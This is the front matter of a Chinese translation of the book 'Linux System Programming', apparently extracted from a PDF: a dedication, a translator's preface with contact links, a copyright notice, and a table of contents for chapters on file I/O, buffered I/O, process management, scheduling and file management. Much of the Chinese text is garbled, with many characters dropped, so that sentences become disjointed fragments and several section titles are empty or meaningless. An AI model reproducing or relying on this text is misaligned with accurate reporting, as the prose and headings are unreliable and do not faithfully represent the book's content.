text
stringlengths 100
9.93M
| category
stringclasses 11
values |
---|---|
谨将我们的工作献给
即将毕业离校的兄弟们 — 林晓鑫、刘德超、黄巍、周蓝
珺、胡禹轩、王新喜、何春晓、崔剑、李浩。
以及
潘海东即将出世的小 Baby!
– II –
0
译者序
Linux System Prorgramming ( LSP) 的文工作实
工业 IBM 理
的。工作的同的
同。们林晓鑫、王、崔春、、何春晓、、李、
、、、。的 [email protected] 文献
的王。刘文、王、刘德超、、王新喜同
校工作。的校。工业文
TeX 作的工作李。
的工作 LSP 文进。
内布原 IBM (
工程) 晓 ( SUN ) 的们
的业时间对进的校提出的
。们的的同。们示。
程 Harbin Linux User Group 的
, 们示。
程方的工作以
的的。存何方式
我们:
Website : http://www.footoo.org
Twitter : http://twitter.com/cliffwoo
Email :[email protected] 或 [email protected]
Google Groups :http://groups.google.com/group/lspcn/
工业
2009 4 30
– III –
0
版权声明
Linux System Programming文的工作工业
IBM 的。文程的,
业。
Linux System Prorgramming的作及原出文
程的。原作及出的出、、作
的。
– IV –
目
录
译者序. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
III
版权声明 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . IV
第 1 章 简介和主要概念. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
1.1 程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1
1.1.1 调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
2
1.1.2 调调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
1.1.3 C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3
1.1.4 C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
4
1.2 API ABI. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
4
1.2.1 API. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
4
1.2.2 ABI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5
1.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5
1.3.1 POSIX SUS 的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
6
1.3.2 C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7
1.3.3 Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
7
1.3.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
8
1.4 Linux 程 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
8
1.4.1 文件文件 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
8
1.4.2 文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
9
1.4.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
10
1.4.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
11
1.4.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
12
1.4.6 文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
12
1.4.7 文件空间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
13
1.4.8 进程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
14
1.4.9 程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
15
1.4.10 进程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
16
1.4.11 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
16
1.4.12 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17
1.4.13 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
18
1.4.14 进程间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
18
1.4.15 文件 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
19
1.4.16 处理. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
19
1.5 程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
22
– V –
第 2 章 文件 I/O. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
23
2.1 文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
24
2.1.1 open() 调 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
24
2.1.2 新文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
26
2.1.3 新文件 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
26
2.1.4 creat() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
28
2.1.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
29
2.2 read() 读文件 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
29
2.2.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
30
2.2.2 读的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
31
2.2.3 读. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
32
2.2.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
33
2.2.5 read() 小 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
33
2.3 write() 写 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
34
2.3.1 写 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
35
2.3.2 式. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
36
2.3.3 写. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
36
2.3.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
36
2.3.5 write() 小. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
37
2.3.6 write() 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
37
2.4 同步 I/O. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
38
2.4.1 fsync() fdatasync() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
38
2.4.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
39
2.4.3 sync(). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
40
2.4.4 O SYNC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
41
2.4.5 O DSYNC O RSYNC. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
41
2.5 I/O. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
42
2.6 文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
42
2.6.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
43
2.7 lseek() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
44
2.7.1 文件进 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
45
2.7.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
46
2.7.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
46
2.8 读写. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
46
2.8.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
47
2.9 文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
47
2.10I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
49
2.10.1 select() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
50
2.10.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
52
2.10.3 poll() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
57
2.10.4 poll() select(). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
61
– VI –
2.11内内. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
61
2.11.1 文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
62
2.11.2 页存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
63
2.11.3 页写 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
64
2.12 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
65
第 3 章 缓冲输入输出 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
66
3.1 I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
66
3.1.1 小 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
67
3.1.2 I/O. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
68
3.1.3 文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
68
3.2 文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
69
3.2.1 式. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
69
3.2.2 文件文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
70
3.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
71
3.3.1 的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
71
3.4 读 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
71
3.4.1 单读 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
71
3.4.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
72
3.4.3 的读 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
72
3.4.4 读 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
73
3.4.5 读进文件 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
74
3.5 写. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
75
3.5.1 对的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
75
3.5.2 写单. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
76
3.5.3 写 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
76
3.5.4 写进 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
77
3.5.5 I/O 示程 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
77
3.6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
79
3.6.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
80
3.7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
81
3.8 文件 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
82
3.9 的文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
83
3.10. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
83
3.11程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
85
3.11.1 文件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
85
3.11.2 操作. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
86
3.12对 I/O 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
87
3.13 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
88
– VII –
第 4 章 高级文件 I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
89
4.1 散布 / 聚集 I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
89
4.1.1 readv() writev() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
90
4.2 Event Poll . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
96
4.2.1 新的 epoll 实 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
96
4.2.2 epoll . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
97
4.2.3 Epoll 件 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
99
4.2.4 件件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
4.3 存映射. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
4.3.1 mmap() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
4.3.2 munmap(). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
4.3.3 存映射子. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
4.3.4 mmap() 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108
4.3.5 mmap() 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
4.3.6 调映射的小 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
4.3.7 映射的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
4.3.8 映射同步文件 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111
4.3.9 映射提示. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
4.4 文件 I/O 提示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
4.4.1 posix fadvise() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114
4.4.2 readahead() 调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
4.4.3 实的操作提示. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
4.5 同步 (Synchronized)同步 (Synchronous) 及异步 ( Asynchronous) 操作 . . 117
4.5.1 异步 I/O. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
4.6 I/O 调 I/O 性能 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
4.6.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
4.6.2 调的能. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
4.6.3 进读 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
4.6.4 的 I/O 调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
4.6.5 I/O 性能 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
4.7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
第 5 章 进程管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
5.1 进程 ID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
5.1.1 进程 ID. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
5.1.2 进程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
5.1.3 pid t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
5.1.4 进程 ID 进程的 ID. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
5.2 新进程 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
5.2.1 exec 调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
5.2.2 fork() 调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
– VIII –
5.3 进程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143
5.3.1 进程的方式 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
5.3.2 atexit(). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145
5.3.3 on exit( ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
5.3.4 SIGCHLD . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
5.4 的子进程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
5.4.1 进程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
5.4.2 子进程的方 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 152
5.4.3 BSD 的 wait3() wait4() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
5.4.4 新进程 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
5.4.5 进程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
5.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
5.5.1 实 ()ID、效 ()ID 存设的 ()ID . . . . . . 159
5.5.2 实 ()ID 存设的 ()ID . . . . . . . . . . . . . . . . . . . . 160
5.5.3 效 ID. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
5.5.4 BSD ID ID 的方式. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
5.5.5 HP-UX ID ID 的方式. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
5.5.6 操作 ID ID 的方. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
5.5.7 对存设的 ID 的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
5.5.8 ID ID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
5.6 进程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
5.6.1 相的调 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
5.6.2 进程相的调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
5.6.3 的进程 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168
5.7 进程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
5.8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
第 6 章 高级进程管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
6.1 进程调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
6.1.1 O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
6.1.2 时间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
6.1.3 I/O 进程 Vs. 处理进程 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
6.1.4 调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
6.1.5 程. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
6.2 出处理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
6.2.1 理. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
6.2.2 出处理方的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
6.3 进程 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
6.3.1 nice() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
6.3.2 getpriority() setpriority(). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
6.3.3 I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
– IX –
6.4 处理. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
6.4.1 sched getaffinity() sched setaffinity() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
6.5 实时. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
6.5.1 实时. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
6.5.2 时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
6.5.3 Linux 的实时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187
6.5.4 Linux 调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
6.5.5 设调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
6.5.6 sched rr get interval() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
6.5.7 实时进程的提. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197
6.5.8 性 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197
6.6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 200
6.6.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 201
6.6.2 设 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204
第 7 章 文件与目录管理. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
7.1 文件及 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
7.1.1 stat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
7.1.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
